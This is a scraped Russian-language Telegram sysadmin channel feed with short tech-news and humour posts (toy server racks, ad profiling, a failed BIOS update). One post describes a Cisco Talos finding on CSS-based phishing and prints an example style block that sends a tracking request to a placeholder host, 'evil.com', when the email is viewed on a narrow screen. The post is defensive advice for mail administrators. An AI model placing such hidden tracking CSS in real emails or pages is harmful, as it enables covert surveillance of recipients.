Теперь можно собирать дата-центры, не выходя из дома: в Японии появились вендинговые автоматы с миниатюрными серверными стойками
• Теперь в автоматах Gachapon🤔 можно купить миниатюрные 19-дюймовые серверные стойки в масштабе 1/12 с крошечными серверами Dell, коммутаторами Cisco и другими сетевыми устройствами.
• За $3,5 вы получаете не просто игрушку, а точную копию реального оборудования.
• Можно собирать стойки в разных конфигурациях, подключая устройства кабелями. Особенно интересно это окажется для коллекционеров.
А траффик они тоже обрабатывают в масштабе 1/12?🤔
Типичный🥸 Сисадмин
• Теперь в автоматах Gachapon
• За $3,5 вы получаете не просто игрушку, а точную копию реального оборудования.
• Можно собирать стойки в разных конфигурациях, подключая устройства кабелями. Особенно интересно это окажется для коллекционеров.
А траффик они тоже обрабатывают в масштабе 1/12?
Типичный
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍74😁44❤10🔥10👎2💊1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🗿58👍36💊16😁14🏆5⚡4🔥2❤1
Forwarded from godnoTECH - Новости IT
Media is too big
VIEW IN TELEGRAM
Французская Publicis Groupe выпустила видео, которое заставило экспертов по кибербезопасности схватиться за голову. Алгоритм CoreAI анализирует поведение 91% взрослых интернет-пользователей, предсказывая их действия и влияя на выбор.
— В видео Publicis представила модельного пользователя Лолу, которая олицетворяет среднестатистического потребителя.
— Компания знает о ней буквально все: что она читает, смотрит, где живет, с кем общается, что и где покупает, а главное — почему она это делает🛍
— CoreAI анализирует даже такие детали, как инфляция и изменения цен на товары, предсказывая, что Лола, например, переключится на более дешевый бренд сока для своих детей.
— Как только алгоритм делает такой вывод, Publicis тут же начинает показывать ей рекламу именно этих более дешевых товаров.
😱 — Это уже перебор!
😴 — Пусть смотрят, мне скрывать нечего.
😁 — Реклама дешёвого сока? Да это же гениально!
Please open Telegram to view this post
VIEW IN TELEGRAM
😱105😁27🗿3👍2🍌2🤷♀1🫡1🆒1
Please open Telegram to view this post
VIEW IN TELEGRAM
😁129👏8💊6💯2
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥59😱13🌚7👍4✍2😁2❤1💊1
Новый фишинг: Использование CSS для обхода спам-фильтров и слежки за пользователями.
Специалисты Cisco Talos опубликовали данные о новой технике, которую хакеры применяют для доставки фишинговых писем и слежки за жертвами. В отличие от традиционных методов с использованием JavaScript, здесь задействуется CSS, что усложняет обнаружение современными почтовыми фильтрами.
Как это работает, в двух словах:
Злоумышленники встраивают в HTML-письмо хитрый CSS-код, который:
🟢 Прячет фишинговый контент: Используют CSS-свойства вроде
🟢 Организует слежку: Через
🟢 Обходит детекцию: Без JavaScript письмо выглядит менее подозрительно для систем, которые заточены на ловлю скриптов или вредных вложений.
Вот пример кода для наглядности:
Принцип работы трекера:
Изменение размера окна просмотра письма (например, открытие на телефоне) может активировать скрытые элементы CSS. Эти элементы, в свою очередь, инициируют запросы к внешним ресурсам, расположенным на сервере злоумышленников, тем самым отслеживая активность пользователя.
Технические нюансы:
🟢 JavaScript free: Вся схема работает только на HTML и CSS, что делает ее устойчивой к блокировщикам скриптов.
🟢 Слабое место фильтров: Большинство спам-фильтров пока не умеют глубоко анализировать CSS на предмет таких штук, а сигнатуры еще не обновились.
🟢 Вариативность сокрытия: Кроме
Что делать сисадминам, чтобы не пропустить новый фишинг:
🟢 Прокачать фильтры: Настроить почтовые шлюзы на более глубокий анализ CSS в HTML-письмах. Для SpamAssassin, например, можно добавить правила для отлова подозрительных
🟢 Мониторить исходящий трафик: Следить за запросами к подозрительным доменам из почтовых клиентов, особенно если видите запросы на загрузку фоновых изображений (
🟢 Просвещать пользователей.
Пока это не массовая история, но метод реально обходит стандартные защиты и может стать трендом. Возможен рост таких атак, особенно в корпоративной среде.
Пора пересесть на😬
Типичный🥸 Сисадмин
Специалисты Cisco Talos опубликовали данные о новой технике, которую хакеры применяют для доставки фишинговых писем и слежки за жертвами. В отличие от традиционных методов с использованием JavaScript, здесь задействуется CSS, что усложняет обнаружение современными почтовыми фильтрами.
Как это работает, в двух словах:
Злоумышленники встраивают в HTML-письмо хитрый CSS-код, который:
text-indent: -9999px, opacity: 0 и другие, чтобы скрыть вредоносные элементы от глаз пользователей и простых спам-фильтров, которые смотрят на видимый текст.@media-запросы (например, @media (max-width: 600px)) отслеживают взаимодействие с письмом – изменение размера окна, клики и т.п. – и отправляют данные на сервер злоумышленников.Вот пример кода для наглядности:
<style>
.tracker { display: none; }
@media (max-width: 600px) {
.tracker { display: block; background: url('http://evil.com/track?user=1'); }
}
</style>
<div class="tracker"></div>
Принцип работы трекера:
Изменение размера окна просмотра письма (например, открытие на телефоне) может активировать скрытые элементы CSS. Эти элементы, в свою очередь, инициируют запросы к внешним ресурсам, расположенным на сервере злоумышленников, тем самым отслеживая активность пользователя.
Технические нюансы:
text-indent и opacity, могут использовать position: absolute с отрицательными координатами или font-size: 0 для маскировки текста. Главное – скрыть видимое, но сохранить работоспособность трекера при рендеринге.Что делать сисадминам, чтобы не пропустить новый фишинг:
@media-запросов.background: url()).Пока это не массовая история, но метод реально обходит стандартные защиты и может стать трендом. Возможен рост таких атак, особенно в корпоративной среде.
Пора пересесть на
lynx и читать почту в терминале Типичный
Please open Telegram to view this post
VIEW IN TELEGRAM
✍31👍13❤2⚡1🔥1😁1
• Пользователь Reddit с ником GoatWithAGun решил обновить BIOS своей системной платы BioStar A320MH — процесс начался, сразу пошёл странно, но при этом не прекращался.
• Обновление не завершалось: сначала час, потом сутки, а в итоге — более 100 часов.
• В итоге процесс завершился сбоем, и система перестала работать.
Интересно, спустя первый час его ничего не смутило?
Типичный
Please open Telegram to view this post
VIEW IN TELEGRAM
😁120😭16🫡6👍4
#предложка
Очень страшно начинать😶
🥸 : Еще больше масла в огонь подливает тот факт, что на стуле следы от обуви... Какова вероятность, что предыдущий админ выпилился?
Типичный😬 Сисадмин
Очень страшно начинать
Типичный
Please open Telegram to view this post
VIEW IN TELEGRAM
😁107😱22🌚14🫡3👎2👍1🌭1
Forwarded from godnoTECH - Новости IT
YouTube-канал Elbrus PC Play для запуска взял «старенькую» версию Minecraft 1.12.2; а в «роли Java» использовал OpenJDK 8.
• Нагрузка на видеокарту обычно была на уровне 5-15%
• На процессор — 10-20%, иногда поднималась до 30%.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥94💊27😁17❤9👍8🌚3🙊3⚡1
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
💊83😁11🌚5🔥3👍2🏆2👎1